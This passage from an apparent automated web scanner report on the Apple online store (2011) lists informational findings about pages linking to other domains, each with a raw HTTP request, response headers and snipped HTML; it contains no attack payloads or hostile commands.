Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);

Response

HTTP/1.1 200 Apple
Date: Thu, 03 Feb 2011 18:10:26 GMT
Server: Apache/1.3.41-ps_webdav_01 (Darwin)
set-cookie: wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; path=/1-800-MY-APPLE/WebObjects/AppleStore.woa;
set-cookie: woinst=920064012; path=/1-800-MY-APPLE/WebObjects/AppleStore.woa;
last-modified: Thu, 03 Feb 2011 10:11:02 GMT
cache-control: no-store, private, must-revalidate, proxy-revalidate, max-age=0, pre-check=0, post-check=0, no-cache
expires: Tue, 02 Feb 2010 10:11:02 GMT
pragma: no-cache
vary: *
connection: close
content-length: 7059
Content-Type: text/html; charset=ISO-8859-1
x-frame-options: sameorigin

<!DOCTYPE html PUBLIC "-//W3C//HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<title>The Apple Store (U.S.)</title>
<meta name="viewpo
...[SNIP]...
</script>


<link media="screen, print" type="text/css" rel="stylesheet" href="http://a248.e.akamai.net/7/248/2041/1806/store.apple.com/rs/applestore-rs-mercury.css" />


<link media="screen, print" type="text/css" rel="stylesheet" href="http://a248.e.akamai.net/7/248/2041/1806/store.apple.com/rs/applestore-rs-header-footer.css" />


<link media="screen, print" type="text/css" rel="stylesheet" href="http://a248.e.akamai.net/7/248/2041/1806/store.apple.com/Catalog/regional/amr/css/aos-overrides.css" />


<!--[if IE 6]>
...[SNIP]...
<![endif]-->


<link media="screen, print" type="text/css" rel="stylesheet" href="http://a248.e.akamai.net/7/248/2041/1806/store.apple.com/Catalog/US/Images/css/aos-local.css" />


<!--[if IE 6]>
...[SNIP]...
<![endif]-->


<link media="all" type="text/css" rel="stylesheet" href="http://a248.e.akamai.net/7/248/2041/1806/store.apple.com/1-800-MY-APPLE/WebObjects/AppleStore.woa/920064012/sr/us/css/a/applestore.css" />


<link media="print" type="text/css" rel="stylesheet" href="http://a248.e.akamai.net/7/248/2041/1806/store.apple.com/1-800-MY-APPLE/WebObjects/AppleStore.woa/920064012/sr/us/css/p/print.css" />


<script src="http://a248.e.akamai.net/7/248/2041/1806/store.apple.com/1-800-MY-APPLE/WebObjects/AppleStore.woa/920064012/sr/us/js/javascripts-library.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://a248.e.akamai.net/7/248/2041/1806/store.apple.com/rs/js/metrics/s_code_h.js" type="text/javascript"></script>
...[SNIP]...
<td nowrap><img src="http://a248.e.akamai.net/7/248/2041/1806/store.apple.com/Catalog/US/Images/titleoops.gif" height="88" width="170" alt="titleoops.gif" /></td>
...[SNIP]...
<a href="http://store.apple.com" target="_top"><img src="http://a248.e.akamai.net/7/248/2041/1806/store.apple.com/Catalog/US/Images/arrowblueright.gif" height="14" width="11" alt="arrowblueright.gif" /></a></td>
           <td><a href="http://store.apple.com" target="_top"><img src="http://a248.e.akamai.net/7/248/2041/1806/store.apple.com/Catalog/US/Images/linkstoremenu.gif" height="20" width="156" alt="linkstoremenu.gif" /></a>
...[SNIP]...

18.103. http://store.apple.com/Catalog/US/Images/intlstoreroutingpage.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.apple.com
Path:   /Catalog/US/Images/intlstoreroutingpage.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Catalog/US/Images/intlstoreroutingpage.html?cid=AOSA10000022132 HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:10:24 GMT
Server: Apache/1.3.41-ps_webdav_01 (Darwin)
Last-Modified: Tue, 26 Oct 2010 18:00:52 GMT
ETag: "15decf-2490-4cc71754"
Accept-Ranges: bytes
Content-Length: 9360
Keep-Alive: timeout=360, max=99968
Connection: Keep-Alive
Content-Type: text/html
x-frame-options: sameorigin

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>

<meta http-equiv="content-type" content="text/html; charset=macintosh">

...[SNIP]...
</script>
<script src="http://a248.e.akamai.net/7/248/2041/1564/store.apple.com/rs1/js/metrics/s_code_h.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script src="http://a248.e.akamai.net/7/248/2041/1554/store.apple.com/rs1/js/coherent/release/coherent.js" type="text/javascript"></script>
...[SNIP]...

18.104. http://store.apple.com/us/browse/campaigns/new_to_mac  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.apple.com
Path:   /us/browse/campaigns/new_to_mac

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /us/browse/campaigns/new_to_mac?mco=MTkyMTQ2NDI HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 03 Feb 2011 17:48:24 GMT
Cache-Control: private, max-age=600
Expires: Thu, 03 Feb 2011 18:16:57 GMT
ETag: "246398227ef39e3e988d33e0187035cb"
Vary: accept-encoding
content-type: text/html; charset=UTF-8; encoding=UTF8
Date: Thu, 03 Feb 2011 18:06:57 GMT
x-request-id: 0202f1a9-28cf-4cf7-b40b-1c2172efafde
Content-Length: 43371
x-frame-options: sameorigin

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html class="en-us en us" lang="en-US">
<head>
<meta name="viewport" content="width=1024" />
   
...[SNIP]...
grade level, you qualify for special pricing on Apple computers and software and select third-party products. Visit the Apple Online Store for Education to place your order. Quantity limits apply. See <a href="http://a248.e.akamai.net/7/248/2041/1508/store.apple.com/Catalog/US/Images/salespoliciesEdIndividual.html" target="popup-w450-h500">terms and conditions</a>
...[SNIP]...
ac OS X Leopard. Simply enter your email account information and you&#146;re good to go. If you have email messages in Microsoft Outlook on your PC, you can transfer them to your Mac using inexpensive <a href="http://www.littlemachines.com" target="_blank">third-party software</a>
...[SNIP]...

18.105. http://store.apple.com/us/browse/home/giftcards  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.apple.com
Path:   /us/browse/home/giftcards

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /us/browse/home/giftcards?mco=MTc0MjU1NzE HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);

Response

HTTP/1.1 200 OK
x-request-id: 986cf424-780c-416e-8328-d761ad85c49a
Cache-Control: private, max-age=600
Vary: accept-encoding
Expires: Thu, 03 Feb 2011 18:16:34 GMT
Last-Modified: Thu, 03 Feb 2011 17:43:39 GMT
ETag: "925648e4345d27d46011fde18f7ecf65"
content-type: text/html; charset=UTF-8; encoding=UTF8
Date: Thu, 03 Feb 2011 18:06:34 GMT
Content-Length: 33499
x-frame-options: sameorigin

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html class="en-us en us" lang="en-US">
<head>
<meta name="viewport" content="width=1024" />
   
...[SNIP]...
onditions and eligibility criteria of the mobile network provider apply to iPhone purchases, including new two-year wireless service contract, sold separately to qualified customers 18 or older. Visit <a href="http://www.wireless.att.com" onclick="s_objectID='MTcyNTE0MjI';" >www.wireless.att.com</a>
...[SNIP]...
ed for some features; broadband recommended; fees may apply. Some applications, features, and services are not available in all areas. Application availability and pricing are subject to change. Visit <a href="http://www.wireless.att.com" onclick="s_objectID='MTcyNTE0Mjg';" >www.wireless.att.com</a>
...[SNIP]...

18.106. http://store.apple.com/us/browse/home/shop_ipad/family/ipad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.apple.com
Path:   /us/browse/home/shop_ipad/family/ipad

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /us/browse/home/shop_ipad/family/ipad?mco=OTY2ODA0NQ HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome; s_pathLength=homepage%3D1%2C; geo=US; s_sq=%5B%5BB%5D%5D; s_ppv=100%2C100%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; s_invisit_us=homepage%3Dtrue%3B; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=apple%20-%20index%20(US);

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 03 Feb 2011 17:02:27 GMT
Cache-Control: private, max-age=600
Expires: Thu, 03 Feb 2011 17:58:04 GMT
ETag: "1c00ccefce54716224011cd8e5214953"
Vary: accept-encoding
content-type: text/html; charset=UTF-8; encoding=UTF8
Date: Thu, 03 Feb 2011 17:48:04 GMT
x-request-id: 99058fd6-8339-4582-b139-ad388226619c
Content-Length: 56556
x-frame-options: sameorigin

<!DOCTYPE html>
<html class="en-us en us" lang="en-US">
<head>
<meta name="viewport" content="width=1024" />

<title>iPad - iPad WiFi - iPad WiFi + 3G - Apple Store (U.S.)</title>

<meta http-
...[SNIP]...
<li>iTunes 9.1 or later (<a href="http://www.itunes.com/download">free download</a>
...[SNIP]...
<li>iTunes 9.1 or later (<a href="http://www.itunes.com/download">free download</a>
...[SNIP]...
<p>Simply enter your street address, city, and state or zip code in the <a targe="_blank" href="http://www.wireless.att.com/coverageviewer/#?type=data">AT&amp;T Data Coverage Viewer</a>
...[SNIP]...

18.107. http://store.apple.com/us/browse/home/shop_iphone/family/iphone  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.apple.com
Path:   /us/browse/home/shop_iphone/family/iphone

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /us/browse/home/shop_iphone/family/iphone?mco=OTY2ODA2OQ HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome; s_pathLength=homepage%3D1%2C; geo=US; s_sq=%5B%5BB%5D%5D; s_ppv=100%2C100%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; s_invisit_us=homepage%3Dtrue%3B; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=apple%20-%20index%20(US);

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 03 Feb 2011 17:00:45 GMT
Cache-Control: private, max-age=600
Expires: Thu, 03 Feb 2011 17:57:31 GMT
ETag: "447f3a52f373a138551fc2157bda0917"
content-type: text/html; charset=UTF-8; encoding=UTF8
x-request-id: f92801d3-71b5-496e-a2dd-ecf3bd168601
Content-Length: 72254
Vary: accept-encoding
Date: Thu, 03 Feb 2011 17:47:31 GMT
x-frame-options: sameorigin

<!DOCTYPE html>
<html class="en-us en us" lang="en-US">
<head>
<meta name="viewport" content="width=1024" />

<title>iPhone 4 &amp; iPhone 3GS - Apple Store (U.S.)</title>

<meta http-equiv="X
...[SNIP]...
<div class="related-links">
<a href="http://static.ips.apple.com.edgekey.net/ipa_preauth/content/catalog/att" target="popup-w850-h790" onclick="s_objectID='MjExNTI4OTk';" >View AT&amp;T plans</a>
...[SNIP]...
<div class="related-links">
<a href="http://static.ips.apple.com.edgekey.net/ipa_preauth/content/catalog/verizon_US" target="popup-w850-h790" onclick="s_objectID='MjExNTI5MDg';" >View Verizon plans</a>
...[SNIP]...
<p><a href="http://www.wireless.att.com/coverageviewer/#?type=voice" target="popup-w900-h840" class="more" onclick="s_objectID='MTcyNzk4MTE';" >View the AT&amp;T coverage map</a>
...[SNIP]...
<p><a href="http://www.verizonwireless.com/b2c/CoverageLocatorController" target="popup-w990-h795" class="more" onclick="s_objectID='MTcyNzk4MTI';" >View the Verizon Wireless coverage map</a>
...[SNIP]...
<p><a href="http://static.ips.apple.com.edgekey.net/ipa_preauth/content/catalog/att" target="popup-w900-h840" class="more" onclick="s_objectID='MTcyNzk4MDI';" >View the AT&amp;T rate plans</a>
...[SNIP]...
<p><a href="http://static.ips.apple.com.edgekey.net/ipa_preauth/content/catalog/verizon_US" target="popup-w850-h790" class="more" onclick="s_objectID='MTgxNTgyMTQ';" >View Verizon rate plans</a>
...[SNIP]...
rogram, which loans customers a country-compatible device at no additional charge for up to three weeks. For more information on Verizon Wireless Global services, products, countries, and rates, visit <a href="http://b2b.vzw.com/international/inside_us.html" onclick="s_objectID='MTcyNzk4MjI';" >http://b2b.vzw.com/international/inside_us.html</a>
...[SNIP]...

18.108. http://store.apple.com/us/cart  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.apple.com
Path:   /us/cart

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /us/cart?mco=Nzc1MjMxMA HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome; s_pathLength=homepage%3D1%2C; geo=US; s_sq=%5B%5BB%5D%5D; s_ppv=100%2C100%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; s_invisit_us=homepage%3Dtrue%3B; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=apple%20-%20index%20(US);

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 03 Feb 2011 17:48:49 GMT
Cache-Control: no-store, private, must-revalidate, proxy-revalidate, max-age=0, pre-check=0, post-check=0, no-cache
Expires: Wed, 02 Feb 2011 17:48:49 GMT
Vary: *
content-type: text/html; charset=UTF-8; encoding=UTF8
Date: Thu, 03 Feb 2011 17:48:49 GMT
x-request-id: 1046abba-ad40-47e5-83e4-ab1eeb43d206
Content-Length: 35748
pragma: no-cache
x-frame-options: sameorigin

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html class="en-us en us" lang="en-US">
<head>
<meta name="viewport" content="width=1024" />
...[SNIP]...
</a>, or buy now and pay later with <a href="https://www.securecheckout.billmelater.com/paycapture-content/fetch?hash=P8P30UTT&content=/bmlweb/apple_coreiw.html">Bill Me Later</a>
...[SNIP]...

18.109. http://store.apple.com/us/instant_credit  previous  next

Summary

